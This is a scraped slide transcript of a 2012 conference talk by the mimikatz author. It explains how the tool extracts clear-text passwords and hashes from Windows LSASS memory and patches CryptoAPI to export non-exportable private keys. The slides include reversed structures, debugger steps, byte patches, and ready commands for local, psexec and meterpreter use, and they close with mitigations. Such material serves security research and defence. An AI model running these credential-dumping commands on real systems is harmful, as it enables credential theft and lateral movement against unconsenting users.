670 likes | 1.03k Views
mimikatz. Benjamin DELPY ` gentilkiwi ` focus on sekurlsa /pass-the-pass and crypto patches. Who ? Why ?. Benjamin DELPY ` gentilkiwi ` French 26y Kiwi addict Lazy programmer Started to code mimikatz to : explain security concepts ; improve my knowledge ;
E N D
mimikatz Benjamin DELPY `gentilkiwi` focus on sekurlsa/pass-the-pass and crypto patches
Who ? Why ? • Benjamin DELPY `gentilkiwi` • French • 26y • Kiwi addict • Lazy programmer • Started to code mimikatzto : • explain security concepts ; • improve my knowledge ; • prove to Microsoft that sometimes they must change old habits. • Why all in French ? • because I’m • It limits script kiddies usage • Hack with class Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatzworking • On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8 • x86 & x64 • 2000 support dropped with mimikatz 1.0 • Everywhere ; it’s statically compiled • Two modes • direct action (local commands) – process or driver communication KeyIso « Isolation de clé CNG » LSASS.EXE EventLog « Journal d’événements Windows » SVCHOST.EXE SamSS « Gestionnaire de comptes de sécurité » LSASS.EXE Direct action : crypto::patchcng VirtualAllocEx, WriteProcessMemory, CreateRemoteThread... Direct action : divers::eventdrop mimikatz.exe mimikatz.exe sekurlsa.dll Open a pipe Write a welcome message Wait commands… and return results Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatzarchitecture of sekurlsa & crypto mimikatz.exe mod_mimikatz_standard mod_parseur mod_mimikatz_winmine mod_text mod_cryptoapi mod_mimikatz_divers mod_memory mimikatz.sys mod_mimikatz_nogpo mod_secacl mod_mimikatz_crypto mod_crypto mod_mimikatz_impersonate mod_mimikatz_inject kappfree.dll mod_pipe mod_cryptoacng mod_mimikatz_samdump mod_inject mod_mimikatz_handle kelloworld.dll mod_hive mod_mimikatz_privilege mod_patch sam msv_1_0 mod_mimikatz_system mod_privilege klock.dll secrets tspkg mod_mimikatz_service mod_system msv_1_0 wdigest mod_mimikatz_sekurlsa mod_service sekurlsa.dll tspkg livessp mod_mimikatz_process mod_process wdigest kerberos mod_mimikatz_thread mod_thread livessp mod_mimikatz_terminalserver mod_ts kerberos Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsawhat is it ? mod_mimikatz_sekurlsa • A module replacement for my previous favorite library ! • A local module that can read data from the SamSS Service (well known LSASS process) • What sekurlsa module can dump : • MSV1_0 hashes • TsPkg passwords • Wdigest passwords • LiveSSP passwords • Kerberos passwords (!) • …? Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsahow LSA works ( level) PLAYSKOOL Authentication msv1_0 kerberos SAM LsaSS WinLogon user:domain:password Authentication Packages msv1_0 Challenge Response tspkg wdigest livessp kerberos Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsahow LSA works ( level) PLAYSKOOL • Authentication packages : • take user’s credentials from the logon • make their own stuff • keep enough data in memory to compute responses of challenges (Single Sign On) • If we can get data, and inject it in another session of LSASS, we avoid authentication part • This is the principle of « Pass-the-hash » • In fact, of « Pass-the-x » Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsahistory of « pass-the-* » 1/2 • Pass-the-hash • 1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN) • 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan Ochoa (CoreSecurity) • 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) present msvctl, and provide some downloads of it • 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity) • 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;)) 2007 was the year of pass the hash ! • Pass-the-ticket • 04/2011 - wce(pass the hash toolkit evolution) provides Kerberos ticket support; Hernan Ochoa (Ampliasecurity) Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsahistory of « pass-the-* » 2/2 • Pass-the-pass • 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3) • http://blog.gentilkiwi.com/securite/pass-the-pass • 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited this time ;)) • http://blog.gentilkiwi.com/securite/re-pass-the-pass • 05/2011 – Some organizations opened cases to Microsoft about it… …Lots of time… • begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz • 03/2012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wcesupport WDigestpassword extract… • http://seclists.org/pen-test/2012/Mar/7 • 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory • http://blog.gentilkiwi.com/securite/rere-pass-the-pass • 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass • 08/2012 – sekurlsa module without injection at all ! (ultra safe) • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: tspkg • because sometimes hash is not enough… Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: tspkgwhat is it ? • Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkopusers’s experience • http://technet.microsoft.com/library/cc772108.aspx • Rely on CredSSPwith Credentials Delegation (!= Account delegation) • Specs : http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf • First impression : it seems cool • User does not have to type its password • Password is not in RDP file • Password is not in user secrets Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: tspkgquestions ? • KB says that for it works, we must enable « Default credentials » delegation • “Default credentials : The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx • What ? Our User/Domain/{Password | Hash | Ticket} ? It seems … • In all cases, system seems to be vulnerable to pass-the-*… • In what form ? Our specs : [MS-CSSP] • 2.2.1.2.1 TSPasswordCreds • The TSPasswordCredsstructure contains the user's password credentials that are delegated to the server. (or PIN) TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING, userName [1] OCTET STRING, password[2] OCTET STRING } • Challenge / response for authentication ? • Serveur : YES (TLS / Kerberos) • Client : NO ; *password* is sent to server… • So password resides somewhere in memory ? Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: tspkgsymbols & theory • Let’s explore some symbols ! • sounds cool… (thanks Microsoft) • Let’s imagine a scenario • Enumerate all sessions to obtain : • Username • Domain • LUID • Call tspkg!TSCredTableLocateDefaultCreds(rely on RtlLookupElementGenericTableAvl) with LUID to obtain : • TS_CREDENTIAL • Call tspkg!TSObtainClearCreds(rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for : • TS_PRIMARY_CREDENTIAL with clear text credentials… kd> x tspkg!*clear* 75016d1c tspkg!TSObtainClearCreds = <no type information> kd> x tspkg!*password* 75011b68 tspkg!TSDuplicatePassword = <no type information> 75011cd4 tspkg!TSHidePassword = <no type information> 750195ee tspkg!TSRevealPassword = <no type information> 75012fbd tspkg!TSUpdateCredentialsPassword = <no type information> kd> x tspkg!*locate* 7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information> Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: tspkgworkflow LsaEnumerateLogonSessions typedefstruct _KIWI_TS_CREDENTIAL { #ifdef _M_X64 BYTE unk0[108]; #elif defined _M_IX86 BYTE unk0[64]; #endif LUID LocallyUniqueIdentifier; PVOID unk1; PVOID unk2; PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; for each LUID KIWI_TS_CREDENTIAL tspkg!TSGlobalCredTable • typedefstruct _KIWI_TS_PRIMARY_CREDENTIAL { • PVOID unk0; • LSA_UNICODE_STRING Domaine; • LSA_UNICODE_STRING UserName; • LSA_UNICODE_STRING Password; • } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; RtlLookupElementGenericTableAvl KIWI_TS_CREDENTIAL KIWI_TS_PRIMARY_CREDENTIAL LsaUnprotectMemory password in clear ! Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: tspkgdemo time ! • sekurlsa::tspkg Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: wdigest • because clear text password over http/https is not cool Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: wdigestwhat is it ? • “Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]” Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication • “Common Digest Authentication Scenarios : • Authenticated client access to a Web site • Authenticated client access using SASL • Authenticated client access with integrity protection to a directory service using LDAP” Microsoft : http://technet.microsoft.com/library/cc778868.aspx • Again, it seems cool • No password over the network, just hashes • No reversible password in Active Directory ; hashes for each realm • Only with Advanced Digest authentication Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: wdigestwhat is it ? • We speak about hashes, but what hashes ? H = MD5(HA1:nonce:[…]:HA2) • HA1 = MD5(username:realm:password) • HA2 = MD5(method:digestURI:[…]) • Even after login, HA1 may change… realm is from server side and cannot be determined before Windows logon • WDigestprovider must have elements to compute responses for different servers : • Username • Realm (from server) • Password Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: wdigesttheory • This time, we know : • that WDigestkeeps password in memory « by protocol » for HA1digest • that LSASS love to unprotect password with LsaUnprotectMemory(so protect with LsaProtectMemory) • LsaUnprotectMemory • At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE • Let’s perform a research in WDigest: • Hypothesis seems verified • LsaProtectMemory • At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE • Let’s perform a research in WDigest : • SpAcceptCredentials takes clear password in args • Protect it with LsaProtectMemory • Update or insert data in double linked list : wdigest!l_LogSessList .text:7409D151 _DigestCalcHA1@8 call dwordptr [eax+0B4h] .text:74096C69 _SpAcceptCredentials@16 call dwordptr [eax+0B0h] Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: wdigestworkflow LsaEnumerateLogonSessions • typedefstruct _KIWI_WDIGEST_LIST_ENTRY { • struct _KIWI_WDIGEST_LIST_ENTRY *Flink; • struct _KIWI_WDIGEST_LIST_ENTRY *Blink; • DWORD UsageCount; • struct _KIWI_WDIGEST_LIST_ENTRY *This; • LUID LocallyUniqueIdentifier; • […] • LSA_UNICODE_STRING UserName; • LSA_UNICODE_STRING Domaine; • LSA_UNICODE_STRING Password; • […] • } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY; for each LUID wdigest!l_LogSessList search linked list for LUID KIWI_WDIGEST_LIST_ENTRY LsaUnprotectMemory password in clear ! Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: wdigestdemo time ! • sekurlsa::wdigest Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: livessp • because Microsoft was too good in closed networks Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: livessphow • Actually I’ve only used logical (empirical) approach to search passwords… : • Protocol reading • Symbols searching ~ Boring~… be more brutal this time : make a WinDBG trap ! 0: kd> !process 0 0 lsass.exe PROCESS 83569040SessionId: 0 Cid: 0224 Peb: 7f43f000 ParentCid: 01b4 DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible> Image: lsass.exe 0: kd> .process /i83569040 You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 0: kd> g Break instruction exception - code 80000003 (first chance) nt!RtlpBreakWithStatusInstruction: 814b39d0 cc int 3 0: kd> .reload /user Loading User Symbols ............................................................ 0: kd> bp /p @$proclsasrv!LsaProtectMemory "kc 5 ; g" 0: kd> g Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: livessphow • Let’s login with a Live account on Windows 8 ! • After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest) lsasrv!LsaProtectMemory livessp!LiveMakeSupplementalCred livessp!LiveMakeSecPkgCredentials livessp!LsaApLogonUserEx2 livessp!SpiLogonUserEx2 lsasrv!LsaProtectMemory msv1_0!NlpAddPrimaryCredential msv1_0!SspAcceptCredentials msv1_0!SpAcceptCredentials lsasrv!LsaProtectMemory tspkg!TSHidePassword tspkg!SpAcceptCredentials Our LiveSSP provider Yeah, Pass the Hash capability with Live account too… Live user can logon through RDP via SSO 1: kd> uf /c livessp!LsaApLogonUserEx2 livessp!LsaApLogonUserEx2 (74781536) [...] livessp!LsaApLogonUserEx2+0x560 (74781a96): call to livessp!LiveCreateLogonSession (74784867) Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: livesspworkflow LsaEnumerateLogonSessions • typedef struct _KIWI_LIVESSP_LIST_ENTRY { • struct _KIWI_LIVESSP_LIST_ENTRY *Flink; • struct _KIWI_LIVESSP_LIST_ENTRY *Blink; • PVOID unk0; • PVOID unk1; • PVOID unk2; • PVOID unk3; • DWORD unk4; • DWORD unk5; • PVOID unk6; • LUID LocallyUniqueIdentifier; • LSA_UNICODE_STRING UserName; • PVOID unk7; • PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds; • } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY; for each LUID livessp!LiveGlobalLogonSessionList search linked list for LUID KIWI_LIVESSP_LIST_ENTRY • typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL { • DWORD isSupp; • DWORD unk0; • LSA_UNICODE_STRING UserName; • LSA_UNICODE_STRING Domaine; • LSA_UNICODE_STRING Password; • } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL; KIWI_LIVESSP_PRIMARY_CREDENTIAL LsaUnprotectMemory password in clear ! Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa • Even if we already have tools for normal accounts, are you not curious to test one with this trap ?* * Me, yes Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: kerberos • Let’s login normal account • After credentials protection, KerbCreateLogonSessioncalls : • NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable • NT5 ; KerbInsertLogonSessionto insert data in KerbLogonSessionList lsasrv!LsaProtectMemory kerberos!KerbHideKey kerberos!KerbCreatePrimaryCredentials kerberos!KerbCreateLogonSession kerberos!SpAcceptCredentials lsasrv!LsaProtectMemory kerberos!KerbHidePassword kerberos!KerbCreateLogonSession kerberos!SpAcceptCredentials lsasrv!LsaProtectMemory msv1_0!NlpAddPrimaryCredential msv1_0!SspAcceptCredentials msv1_0!SpAcceptCredentials lsasrv!LsaProtectMemory wdigest!SpAcceptCredentials lsasrv!LsaProtectMemory tspkg!TSHidePassword tspkg!SpAcceptCredentials Kerberos, ticket part ? Maybe ;) Kerberos part for password ?????? Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: kerberos (nt6)workflow LsaEnumerateLogonSessions for each LUID typedefstruct _KIWI_KERBEROS_PRIMARY_CREDENTIAL { DWORD unk0; PVOID unk1; PVOID unk2; PVOID unk3; #ifdef _M_X64 BYTE unk4[32]; #elif defined _M_IX86 BYTE unk4[20]; #endif LUID LocallyUniqueIdentifier; #ifdef _M_X64 BYTE unk5[44]; #elif defined _M_IX86 BYTE unk5[36]; #endif LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL; Kerberos!KerbGlobalLogonSessionTable KIWI_KERBEROS_PRIMARY_CREDENTIAL RtlLookupElementGenericTableAvl KIWI_KERBEROS_PRIMARY_CREDENTIAL LsaUnprotectMemory password in clear ! Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: kerberos (nt5)workflow LsaEnumerateLogonSessions • typedef struct _KIWI_KERBEROS_LOGON_SESSION { • struct _KIWI_KERBEROS_LOGON_SESSION *Flink; • struct _KIWI_KERBEROS_LOGON_SESSION *Blink; DWORD UsageCount; • PVOID unk0; • PVOID unk1; • PVOID unk2; • DWORD unk3; • DWORD unk4; • PVOID unk5; • PVOID unk6; • PVOID unk7; • LUID LocallyUniqueIdentifier; • #ifdef _M_IX86 • DWORD unk8; • #endif • DWORD unk9; • DWORD unk10; • PVOID unk11; • DWORD unk12; • DWORD unk13; • PVOID unk14; • PVOID unk15; • PVOID unk16; • […] • LSA_UNICODE_STRING UserName; • LSA_UNICODE_STRING Domaine; • LSA_UNICODE_STRING Password; • } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; for each LUID kerberos!KerbLogonSessionList search linked list for LUID KIWI_LIVESSP_PRIMARY_CREDENTIAL LsaUnprotectMemory password in clear ! Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsademo time ! • Final sekurlsademosekurlsa::logonPasswords full Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa :: kerberos“hu?” • Ok It works…* But why ? • Not at all logon on NT5 (can need an unlock) • From my understanding of Microsoft explanations • no need of passwords for the Kerberos protocol… • all is based on the hash (not very sexy too) • Microsoft’s implementation of Kerberos is full of logical… • For password auth : • password hash for shared secret, but keeping password in memory • For full smartcard auth : • No password on client • No hash on client ? • NTLM hash on client… • KDC sent it back as a gift Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsa • All passwords in memory are encrypted, but in a reversible way to be used • We used LsaUnprotecMemory, in the LSASS context, to decrypt them • This function rely on LsaEncryptMemoryfrom lsasrv.dll • For that, we previously inject a DLL (sekurlsa.dll) in the LSASS process to take benefits of its keys when we called it • Can it be fun to decrypt outside the process ? • Yes, it is… no more injection, just reading memory of LSASS process… • mimikatz can use lsasrv.dll too and “imports” LSASS initialized keys • When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we have the same comportments than when we are in LSASS ! LsaUnprotectMemory Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsaLsaEncryptMemoryNT5 • Depending on the size of the secret, LsaEncryptMemoryuse : • RC4 • DESx g_cbRandomKey DWORD ; 256 lsasrv lsass g_pRandomKey @BYTE[g_cbRandomKey] mimikatz lsasrv BYTE[g_cbRandomKey] copy… g_pDESXKey @BYTE[144] lsasrv lsass BYTE[144] BYTE[8] Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsaLsaEncryptMemoryNT6 • Depending on the size of the secret, LsaEncryptMemoryuse : • 3DES • AES BYTE[16] lsasrv lsass typedefstruct _KIWI_BCRYPT_KEY_DATA { DWORD size; DWORD tag; DWORD type; DWORD unk0; DWORD unk1; DWORD unk2; DWORD unk3; PVOID unk4; BYTE data; /* etc... */ } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA; h3DesKey mimikatz lsasrv copy… lsasrv lsass typedefstruct _KIWI_BCRYPT_KEY { DWORD size; DWORD type; PVOID unk0; PKIWI_BCRYPT_KEY_DATA cle; PVOID unk1; } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY; hAesKey Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsamemo • Security Packages • Protection Keys Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsamemo • Some commands : • mimikatz privilege::debug "sekurlsa::logonPasswords full" exit • psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit • meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */ // http://blog.gentilkiwi.com/mimikatz mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;234870 Package d'authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d'authentification : vm-w8-rp-x msv1_0 : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a8514893efccd332446158b1a kerberos : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ wdigest : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ tspkg : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ livessp : n.t. (LUID KO) Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: sekurlsawhat we can do ? • Basics • No physical access to computer (first step to pass the hash, then pass the pass) • No admin rights / system rights / debug privileges (…) • Disable local admin accounts • Strong passwords (haha, it was a joke ; so useless !!!) • For privileged account, network login instead of interactive (when possible) • Audit ; pass the hash keeps traces and can lock accounts • No admin rights / system rights / debug privileges, even VIP • Use separated network (or forest) for privileged tasks • More in depth • Force strong authentication (SmartCard & Token) : $ / € • Short validity for Kerberos tickets • No delegation • Disable NTLM (available with NT6) • No exotic : • biometrics (it keeps password somewhere and push it to Windows) • single sign on • Stop shared secrets for authentication : push Public / Private stuff (like keys ;)) • Let opportunities to stop retro compatibility • Disable faulty providers ? • Is it supported by Microsoft ? • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ? Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: cryptowhat is it ? mod_mimikatz_crypto • A little module that I wrote to : • play with Windows Cryptographic API / CNG and RSA keys • automate export of certificates/keys • Even those which are “not” exportable • What cryptomodule can do : • List • Providers • Stores • Certificates • Keys • Export • Certificates • public in DER format • with private keys in PFX format • Private keys in PVK format • it’s cool, OpenSSL can deal with it too • Patch • CryptoAPIin mimikatz context • CNG in LSASS context (again !) Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: cryptohow it’s protected • Private keys are DPAPI protected • You cannot reuse private key files on another computer • At least without the master keys and/or password of users • Computer/User can load their own keys because they have enough secrets to do it (ex : session opened) • Yes, a computer/server open a “session” • Export/Usage can be limited by : • Password • Popup • Export/Archive flag no present Constraint for most user Unavailable for computer keys certutil-importpfxmycert.p12 NoExport certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: capihow it works • “Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardware.” • http://technet.microsoft.com/library/cc962093.aspx • Processes (mimikatz, IIS, Active Directory , Internet Explorer, yourappshere…) load some DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, … • cryptdll.dll, rsaenh.dll, … • Process deal with cryptographic keys by this API… Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: capihow it’s exported ( level) PLAYSKOOL Process CryptoAPI and RSA CSP LoadPrivate Key DPAPI Decode Exportable ? yes no Ask to export Key NTE_BAD_KEY_STATE Exported Key Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: patchcapibecause I own my process • When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey • This function do all the work to prepare the export, and check if the key is exportable Exportable ? ================ Certificat 0 ================ Numéro de série : 112169417a1c3ef46a301f99385f50680fa0 Émetteur: CN=GlobalSignCodeSigning CA - G2, O=GlobalSignnv-sa, C=BE Objet: CN=Benjamin Delpy, C=FR Il ne s'agit pas d'un certificatracine Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03} Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0 La cléprivéeNE PEUT PAS êtreexportée Succès du test de cryptage CertUtil : -exportPFXÉCHEC de la commande : 0x8009000b (-2146893813) CertUtil: Clé non valide pour l'utilisationdansl'étatspécifié. mimikatz # crypto::exportCertificates Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My - Benjamin Delpy Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03} Provider : Microsoft Enhanced Cryptographic Provider v1.0 Type : AT_KEYEXCHANGE Exportabilité : NON Tailleclé : 2048 Export privédans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisationdansl'étatspécifié. Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: patchcapibecause I own my process • So what ? A module in my own process return that I can’t do something ?CryptoAPI is in my memory space, let’s patch it ! • I wrote “4” bytes in my memory space .text:0AC0B7CB 0F 85 33 C7 FF FFjnzcontinue_key_export_or_archive .text:0AC0B7CB 90nop .text:0AC0B7CC E933 C7 FF FFjmpcontinue_key_export_or_archive .text:0AC1F749 0F 85B6 3B FF FFjnzcontinue_key_export_or_archive_prepare .text:0AC1F749 90nop .text:0AC1F74A E9B6 3B FF FFjmpcontinue_key_export_or_archive_prepare Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: patchcapidemo time ! • Import, export, import as not exportable…. export Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: crypto :: patchcapilimitations • Because : • I’m lazy • I’ve seen in majority of case RSA keys for real life use • Elliptic Curve a little… • mimikatz crypto::patchcapionly deal with : • Microsoft Base Cryptographic Provider v1.0 • Microsoft Enhanced Cryptographic Provider v1.0 • Microsoft Enhanced RSA and AES Cryptographic Provider • Microsoft RSA SChannel Cryptographic Provider • Microsoft Strong Cryptographic Provider • …all based on rsaenh.dll Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
